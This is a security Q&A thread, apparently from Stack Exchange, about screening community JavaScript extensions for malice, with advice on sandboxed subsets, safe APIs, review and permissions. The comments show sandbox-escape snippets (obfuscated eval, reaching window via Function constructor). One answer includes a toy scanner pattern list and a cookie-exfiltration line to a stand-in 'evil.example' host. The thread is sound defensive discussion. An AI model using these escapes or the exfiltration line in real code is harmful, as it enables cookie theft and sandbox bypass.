22

We're planning to let the community write extensions in JavaScript for our public webapp, so that people can customize their instances of the application. The problem is how to monitor the quality of these extensions.

What would you suggest for automating this process?

Or how can we scan JavaScript for malicious code?

In a few words, we would like a service, something like an antivirus, that scans uploaded extensions in real time for malicious code and raises an alert if it detects anything suspicious.

Any hint/advice is welcome! Thank you.

Igor
  • I don't think this is as easy as you believe it is. Javascript can't do anything malicious by itself and there's no "virus" to be detected. Javascript is the primary vector for [Cross Site Scripting attacks](http://en.wikipedia.org/wiki/Cross-site_scripting), but it would be better to secure your webapp against this rather than to trust extensions. It's your webapp that's vulnerable and you'd need a good understanding of the webapp in order to analyze extensions for their security. – slhck Dec 15 '11 at 23:56
  • This is pretty much impossible to do at such a generic level without knowing a ton about the site, how it's structured, what is public and what is private and what needs to be protected on the site. Among other things, you will want to make sure the extensions are structured such that an extension that one user deploys can't get access to any data from another user's site or trick other users into doing something. – jfriend00 Dec 15 '11 at 23:57
  • @jfriend00, the most common use case for JavaScript is web applications which are executed in the sandbox of the browser. Igor, however, mentions extensions, which implies that this is not just a normal web page. The JavaScript in Firefox extensions, to give one example, has full access to the computer: it can read and write any file and execute any program that the operating-system user has access to. – Hendrik Brummermann Dec 16 '11 at 08:00

5 Answers

9

One approach would be to define a safe API for the extensions to use, by declaring objects implementing that API in the scope of execution for the extension. Then require the extension code to be written in a sandboxed version of Javascript, so the extension code can invoke only the safe API methods you defined and nothing more.

So, if your API consisted of an object stored in a variable api, then the code:

var x = api.frob();
x.bar();

would be allowed extension code, because api is part of your safe API, and the safe Javascript variants allow you to invoke the API that is exposed to extension code.

However, the code:

document.createElement("img");

would not be allowed, because document is not part of your safe API.

In designing the API, make sure that no exposed object has properties that could be used maliciously. To give limited access to a resource, use closures to make functions that privately reference the resource.
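As a minimal sketch of that closure idea (the `frob`/`bar` names follow the example above; the private `settings` store and its validation are hypothetical):

// Build the `api` object inside a closure so extensions can call a few
// safe methods but can never reach the underlying resource directly.
var api = (function () {
  var settings = {};                 // private; invisible to extension code

  return {
    frob: function () {
      // Hand out a narrow wrapper object, never a raw DOM node.
      return {
        bar: function () { /* one narrowly-scoped, vetted action */ }
      };
    },
    setPreference: function (key, value) {
      // Validate inputs before touching the private resource.
      if (typeof key === "string" && typeof value === "string") {
        settings[key] = value;
      }
    },
    getPreference: function (key) {
      return typeof key === "string" ? settings[key] : undefined;
    }
  };
})();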

There are a number of projects out there that have defined a sandboxed version of Javascript you could use for this purpose: SES, Caja, ADsafe, FBJS, and others. SES and Caja let developers write code with the fewest restrictions: it feels a lot like just writing Javascript, with a few minor restrictions (e.g., no eval, no with). ADsafe and FBJS require the developer to learn a variant of Javascript. SES, ADsafe, and FBJS have the best performance. SES requires support from a very recent Javascript engine, and thus is not compatible with some older web browsers. If the extension code will be executed on the server side, then SES may be the best bet, because you can ensure your Javascript engine is up-to-date. If the extension is going to be executed on the user's browser, you might consider Caja if the extension is not performance-critical, or ADsafe/FBJS if it is.
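For a concrete feel of the sandboxed-subset route, here is a rough sketch assuming the modern SES shim (the `ses` npm package): `lockdown`, `harden`, and `Compartment` are its primitives, while the `api` endowment and the extension source string are made up for illustration.

// Confine extension code to a Compartment whose global scope contains
// nothing but the safe API we explicitly endow it with.
import 'ses';

lockdown();                                    // freeze the shared intrinsics

const api = harden({
  frob() { return harden({ bar() { /* safe action */ } }); }
});

const compartment = new Compartment({ api });  // `api` becomes a global inside

// The extension sees `api`, but no `document`, `window`, `fetch`, etc.
compartment.evaluate('var x = api.frob(); x.bar();');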

D.W.
JGWeissman
  • Scanning for such syntactic references will never work. There are too many ways to evade a scan. e.g., `eval(decodeURI("%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22%69%6D%67%22%29"))`. This is just one example; there are a million more like it. – D.W. Dec 18 '11 at 23:03
  • @D.W. The proposed method is to build a whitelist of approved calls. A javascript instruction beginning with "eval" would not be allowed because "eval" is not part of the safe API. – JGWeissman Dec 19 '11 at 19:39
  • This problem is much harder than most people realize. Example: after `function f() { return this; }; var w = f();`, `w` points to the `window` object. Then, `w["document"]["createElement"]("img")` invokes `document.createElement("img")`. Try it and see! Whitelisting is not enough to save you from that kind of attack. Restricting malicious Javascript is a very hard problem: just scanning Javascript for references and checking them on a whitelist is not enough. See, e.g., Caja, MS WebSandbox, ADsafe, and other systems for examples of this done right (but beware that they are complex). – D.W. Dec 20 '11 at 08:34
  • @D.W. You make a convincing argument for not whitelisting the keyword "this" (you can get equivalent functionality with closures), and to consider carefully which keywords to allow. I would go with just "var" and "function". – JGWeissman Dec 20 '11 at 18:20
  • You seem confident you have the answer, but a friendly note of advice: this problem is much harder than you seem to realize. Excluding `this` from the whitelist is (1) cheesy, because it prevents object-oriented programming, (2) not enough for security anyway, as there are ways to obtain the `window` object without ever using the `this` keyword: e.g., `var w = []["sort"]["call"]();`. There are tons more like this. How many more times would you like to ride the merry-go-round? P.S. Prohibiting all keywords other than `var` and `function` is a non-starter; you can't write useful code that way. – D.W. Dec 20 '11 at 20:58
  • A general note: Anyone can build a security mechanism that defeats all the attacks they can think of. The hard part is to defeat the ones you haven't thought of. – D.W. Dec 20 '11 at 21:08
  • P.S. I'm reminded of a story where an amateur codemaker invented a code he thought was great and took it to an experienced codebreaker, who promptly broke it. The amateur tweaked his scheme to stop that particular attack, took it back, and it was broken again. After a few rounds, the codebreaker got fed up, handed him three envelopes, and said "each envelope has one attack. Don't come back until you've found all three yourself." Lesson: repeatedly patching holes until you can't spot any more is not a great foundation for a secure system. – D.W. Dec 20 '11 at 21:09
  • @D.W. I tried running a script with `var w = []["sort"]["call"]();` and some variations in Firefox and IE. It errored out. Your parable doesn't seem to fit here well. You proposed one exploit that doesn't work against my scheme as presented, one that prompted me to clarify how to decide what goes in a whitelist, and then one that doesn't work at all. – JGWeissman Dec 20 '11 at 23:11
  • Perhaps `[]["sort"]["call"]()` is browser-dependent; it works for me. There are many more. Another fun one: `((function () {})["constructor"])("alert(5)")()`. The general point is that absence of evidence of insecurity is not evidence of security. Just because you are unaware of an exploit doesn't mean that your approach is secure or robust. – D.W. Dec 20 '11 at 23:44
  • @D.W. OK, that one works, and I am convinced that my approach is not feasible. – JGWeissman Dec 21 '11 at 00:18
  • OK, thanks for your patience with me. I do think we can save the overall approach, if we shift to a more secure technology for Javascript subsetting. I would suggest (1) require extensions be written in a sandboxed Javascript subset, like SES, Caja, FBJS, ADSafe, or the like, and (2) define a safe API for extensions to use, and expose only that API. The change in your answer has to do with (1), but (2) can stay as it is. What do you think? – D.W. Dec 21 '11 at 17:42
  • @D.W. Caja looks like a much more advanced version of my approach, as near as I can tell. (The others may be as well, I haven't looked closely.) With Google doing the work of defining the safe subset of Javascript, I wouldn't advise anyone to reinvent that wheel. So it remains to define the safe API within that framework of what an extension in a particular web application is allowed to do. – JGWeissman Dec 21 '11 at 18:53
  • Side note in the discussion: `[]["sort"]["call"]()` will not work in JS strict mode, because calling a method as a function does not default `this` to the global object; it leaves it undefined. This should throw a "cannot convert undefined to object" on Firefox. – flpmor Dec 23 '11 at 14:56
  • @fms Yes, that explains it. I was using strict mode where it did not work. – JGWeissman Dec 23 '11 at 17:43
6

(Do not attempt to roll your own sanitization scheme. Given the complexity of JavaScript, home-grown sanitization would probably be insecure. Use an existing solution that has already been well vetted.)

Google's Caja Compiler is a tool for making third party HTML, CSS and JavaScript safe to embed in your website.

If I remember correctly, it was used for iGoogle, because just separating untrusted code into iframes still had shortcomings.

700 Software
6

There is no good way to scan Javascript for malicious code. You can't do it. The problem is that there are too many ways a malicious/rogue developer can hide malicious stuff in their code, and you'll never be able to detect it all.

Anti-virus is not helpful here. You need to understand a little bit about how anti-virus software works and its limitations. Roughly speaking, here's how it works. If the anti-virus company detects a virus infecting many machines, they analyze the virus, identify a signature of it (e.g., an excerpt of its code), and build this into their engine. Thereafter, if your machine gets infected by a copy of that particular virus (the exact same one they analyzed), the anti-virus software will detect its presence through this signature. As a result, anti-virus software is useful primarily against viruses that have already spread widely. Existing anti-virus software is not going to detect malicious code in a rogue extension for your webapp. Anti-virus software has some uses, but it is basically useless for your particular scenario.
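As a toy illustration of why signature-style scanning is a poor fit for code (both the pattern list and the scanner below are invented, not a real product):

// Toy "antivirus": flag extensions that contain known-bad substrings.
var badPatterns = [/document\.cookie/, /eval\s*\(/, /XMLHttpRequest/];

function looksMalicious(source) {
  return badPatterns.some(function (re) { return re.test(source); });
}

// A blatantly malicious extension is caught...
looksMalicious('new Image().src = "http://evil.example/?c=" + document.cookie'); // true

// ...but the same behaviour, trivially obfuscated, matches no signature at all.
looksMalicious('window["doc" + "ument"]["coo" + "kie"]'); // false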

You need to accept that this is not a problem you can solve by scanning code. So, you'll need to consider some other approach. What are your options? There are several:

  • You could give up and embrace the chaos. You could create a public site for extensions, allow users to rate extensions, and post/view reviews. This way, if a developer posts a low-quality extension that is buggy or crashes things, users who notice it can post a negative review. (Of course, if the developer is malicious and posts an evil extension, there's no guarantee that anyone will ever notice -- if you're lucky, maybe some user will happen to notice the malicious code somehow and report it to you, but it's just as likely that no one will ever notice. That's the risk you take.)

    This is known as having an open extension system. See, e.g., the Android Market or the Google Chrome Extension Gallery or Userscripts.org (a Greasemonkey extension site).

  • You could institute some kind of review system, where experts review each extension before it is posted (or shortly after it is posted) on the public extension site. If you just want to catch quality problems, it might be enough to have the experts install the extension and test it, and perhaps run a code quality bug-finding tool to scan for common problems. If you also want to catch malicious extensions, the reviewer will need to be a developer who is capable of reading code and who reads through the extension line-by-line; this is extremely tedious and time-consuming, but there's not really any better option.

    This is known as having a curated extension system. See, e.g., the Apple iOS App Store or the Firefox extension site (addons.mozilla.org) for some examples, though I believe they focus only on code quality and not on detecting malice.

Whichever approach you take, there is a significant advantage to serving extensions from a single public extension site, which hosts the authoritative version of each extension. You might want to take various steps to encourage users to install extensions from that site and discourage them from installing extensions from other sites (e.g., by default disable installing extensions from other sources and require the user to click to authorize any other domain they want to install from, like Firefox does). What's the benefit? It ensures that all of your users get the same copy of the extension. It prevents attacks where, e.g., a malicious web site uses a script to check the user's browser version and where the user is coming from, and based upon that decides whether to serve malicious code or legitimate code -- those kinds of attacks make it harder to detect malice, so stopping them is a good thing. It also ensures that users get the benefits of reviews and ratings.
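One hedged sketch of how the authoritative site can guarantee "same copy for everyone" is to pin the reviewed extension by hash and refuse to serve anything else (Node.js; the file path and port are hypothetical):

// Record a hash at review/publish time, verify it on every request.
const http = require('http');
const fs = require('fs');
const crypto = require('crypto');

const EXT_PATH = 'extensions/widget-1.0.js';     // hypothetical path
const sha256 = (buf) => crypto.createHash('sha256').update(buf).digest('hex');

const publishedHash = sha256(fs.readFileSync(EXT_PATH));   // recorded once, at review time

http.createServer((req, res) => {
  const body = fs.readFileSync(EXT_PATH);
  if (sha256(body) !== publishedHash) {
    // The file on disk no longer matches what was reviewed: refuse to serve it.
    res.writeHead(500);
    return res.end('extension integrity check failed');
  }
  res.writeHead(200, { 'Content-Type': 'application/javascript' });
  res.end(body);
}).listen(8080);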

You should also consider carefully which APIs are exposed to extensions and which are not. You might expose only a subset of the API to extensions, so that extensions are inherently limited in what they can do, as a way to limit the damage. For instance, the Chrome browser allows extensions to interact with the web page's DOM and the web site, but extensions are not allowed to execute native code (e.g., install and run a .exe). This kind of thing helps security. Alternatively, you could provide a basic API which avoids the highest-risk functionality, and require that any extension which needs access to more than the basic API get approval from the moderators before it can be posted on the public site.

Another possible defense against malicious extensions is to introduce a permission system. You identify a set of permissions. The extension is required to include a manifest, which specifies the set of permissions it needs. When the user installs the extension, the system should show the user the set of permissions the extension is requesting and what those permissions imply (e.g., what security/privacy risks they pose, what access they grant to the extension), allowing the user to either approve the permissions and proceed with installation or to reject them and cancel installation. This gives users more control and visibility over extensions, reduces the risk posed by buggy extensions (because the consequences of a security vulnerability in an extension are now limited to the permissions it requested, not all permissions), and may make malicious extensions more apparent (because they need to request certain permissions to do harm). See, e.g., Android applications or Google Chrome extensions for an example of this sort of thing.
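A hedged sketch of what a manifest plus install-time permission prompt could look like (the permission names and the `installExtension` flow are invented for illustration):

// Hypothetical manifest declared by the extension author.
var manifest = {
  name: "Example Widget",
  version: "1.0",
  permissions: ["read_profile", "modify_own_page"]      // invented permission names
};

// Human-readable descriptions shown to the user at install time.
var permissionDescriptions = {
  read_profile:    "Read your profile information",
  modify_own_page: "Change the appearance of pages you own",
  send_messages:   "Send messages on your behalf"        // high-risk; not requested above
};

function installExtension(manifest, confirmWithUser) {
  var unknown = manifest.permissions.filter(function (p) {
    return !(p in permissionDescriptions);
  });
  if (unknown.length) {
    throw new Error("Unknown permissions requested: " + unknown.join(", "));
  }

  var prompt = manifest.permissions.map(function (p) {
    return permissionDescriptions[p];
  });

  // Proceed only if the user explicitly approves what the extension asks for.
  if (confirmWithUser(manifest.name + " requests:\n- " + prompt.join("\n- "))) {
    return { granted: manifest.permissions };   // later API calls are checked against this grant
  }
  return null;                                  // user rejected; installation cancelled
}

In a browser you might call installExtension(manifest, window.confirm); the point is that the runtime later refuses any API call outside the granted set.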

D.W.
2

I don't know if this can be automated easily, and I agree with @jfriend00 and @slhck as to the general difficulty of successfully screening these scripts. That being said, there is at least one tool I know of that attempts to detect malicious scripts.

This tool is Wepawet, which is operated by the University of California at Santa Barbara. It is described thus:

Wepawet is a framework for the analysis of web-based threats. Wepawet is able to determine if visiting a web page would lead to an attempt to compromise the visitor's environment.

Andrew Lambert
0

IBM AppScan has a static code analysis module called "JavaScript Security Analyzer (JSA)". It is definitely NOT free, but it provides feedback on the security implications of JavaScript code.

Aside from the JSA, I am unaware of any other static code analysis tools that look for security concerns, but I would love to learn about more. Maybe if JSLint/JSHint added some security functions?

schroeder
  • This is not what JSA is designed for. JSA is designed to help an honest-but-fallible developer find inadvertent security bugs in their own code. It is not designed to prevent malicious code in Javascript written by a dishonest/rogue developer. There are many, many ways that a dishonest developer could introduce malicious code that JSA could not detect. – D.W. Dec 18 '11 at 23:04
  • I totally agree that the JSA is not designed to be a total solution to review random code from the public, but it IS a static scanner that deals with security implications. And, as far as I know, the only one on the market. That being said, it becomes an option for the OP who wanted something "like an antivirus", even though he should consider another strategy entirely. --- Is my answer still worth a down-vote? – schroeder Dec 19 '11 at 15:20